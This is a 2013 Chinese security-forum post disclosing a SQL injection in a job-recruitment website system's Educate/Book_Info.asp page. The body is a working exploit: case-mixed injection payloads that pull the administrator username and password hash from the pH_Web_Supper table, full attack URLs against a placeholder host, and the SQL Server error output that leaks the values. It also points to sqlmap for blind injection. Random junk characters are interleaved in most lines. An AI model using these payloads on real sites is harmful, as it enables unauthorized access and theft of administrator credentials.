找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2201|回复: 0
打印 上一主题 下一主题

网络求职招聘人才网站系统正式版注入

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:44:16 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞出现在Educate/Book_Info.asp ! q; o& I8 V- g3 U& W5 l, r: ~

6 N6 r+ \/ w0 {( ]此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出) r8 D/ O' T% p

: P+ d+ N) q! l7 e8 jexp:如下
% S( f/ D3 n& z6 K查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)4 ?3 R8 r1 H; J2 k
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
* e' M  g/ E& z9 x
& `6 k/ Z5 I  t& }# ^7 Ihttp://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper): T  l9 }$ @2 [" ?! c9 J8 g

- R9 T4 g8 _. A  j$ VMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
% i. W' X+ m9 r7 q% U# o% L 3 _( C$ s- A& ?+ X0 H5 u  P, d7 a
将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。$ T9 I+ {7 W& e3 ~

3 `$ a9 G5 C" }+ S/Educate/Book_Info.asp,行 8, T& r6 A: s% Z/ R6 n* Y
: a! Z4 q2 W  Q) }9 R9 B/ r
http://www.xxx.com /Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)* i; R# g/ i3 y/ K( ]4 ^! F
+ j" V* M" w; O( S/ ]
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
% W& Y  T: e3 y  s" P9 V$ h& P
' ~7 o& V/ V' o) r( G; i4 T: t将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。2 ^1 n, R& j& D
0 H+ x5 N' x7 ^1 J' q5 I; c
/Educate/Book_Info.asp,行 86 Q1 ]( D2 j9 [0 n: g3 e; s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表